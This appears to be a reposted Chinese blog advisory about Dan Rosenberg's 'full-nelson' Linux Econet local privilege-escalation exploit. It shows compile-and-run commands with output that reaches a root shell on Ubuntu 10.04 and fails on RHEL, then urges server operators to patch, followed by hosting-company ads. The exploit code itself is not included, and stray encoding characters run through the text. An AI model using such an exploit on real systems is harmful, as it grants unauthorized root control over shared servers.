|
系統(tǒng)安全高手 Dan Rosenberg 發(fā)布了一段 C 程序�����,這段200多行的程序利用了 Linux Econet 協(xié)議的3個(gè)安全漏洞�����,可以導(dǎo)致本地帳號(hào)對(duì)系統(tǒng)進(jìn)行拒絕服務(wù)或特權(quán)提升����,也就是說一個(gè)普通用戶可以通過運(yùn)行這段程序后輕松獲得 root shell,以下在 update 過的 Ubuntu 10.04 Server LTS 上測(cè)試通過:
$ sudo apt-get update
$ sudo apt-get upgrade
$ uname -r
2.6.32-21-server
$ gcc full-nelson.c -o full-nelson
$ ./full-nelson
[*] Resolving kernel addresses...
[+] Resolved econet_ioctl to 0xffffffffa0131510
[+] Resolved econet_ops to 0xffffffffa0131600
[+] Resolved commit_creds to 0xffffffff8108b820
[+] Resolved prepare_kernel_cred to 0xffffffff8108bc00
[*] Calculating target...
[*] Failed to set Econet address.
[*] Triggering payload...
[*] Got root!
#
由于 RHEL/CentOS 默認(rèn)不支持 Econet 協(xié)議�,所以測(cè)試沒有通過:
# yum update
$ uname -r
2.6.18-194.26.1.el5
$ gcc full-nelson.c -o full-nelson
$ ./full-nelson
[*] Failed to open file descriptors.
如果在企業(yè)環(huán)境用 Ubuntu 的話可能會(huì)比較杯具了,幾百個(gè)帳號(hào)里總可以找到一兩個(gè)帳號(hào)被內(nèi)部或外部人員通過上面這段程序拿到 root�,這對(duì)服務(wù)器的危害是毀滅性的。前天還在說 Ubuntu 在內(nèi)核方面無作為���,現(xiàn)在想起來還有點(diǎn)后怕。VPSee 提醒正在使用多個(gè)普通帳號(hào)登錄 Ubuntu VPS 的朋友及時(shí)升級(jí)或打內(nèi)核補(bǔ)丁�����,出售 VPN/SSH 帳號(hào)���、提供免費(fèi) SSH 的商家尤其要小心 “客戶” 搗亂���,使用其他 Linux 發(fā)行版的朋友也最好檢查一下自己的 VPS 有沒有這些高危漏洞���。
億恩科技地址(ADD):鄭州市黃河路129號(hào)天一大廈608室 郵編(ZIP):450008 傳真(FAX):0371-60123888
聯(lián)系:億恩小凡
QQ:89317007
電話:0371-63322206
本文出自:億恩科技【1tcdy.com】
服務(wù)器租用/服務(wù)器托管中國五強(qiáng)����!虛擬主機(jī)域名注冊(cè)頂級(jí)提供商!15年品質(zhì)保障����!--億恩科技[ENKJ.COM]
|
香港服務(wù)器租用
美國服務(wù)器租用
電信骨干機(jī)房
聯(lián)通骨干機(jī)房
0371-60135900
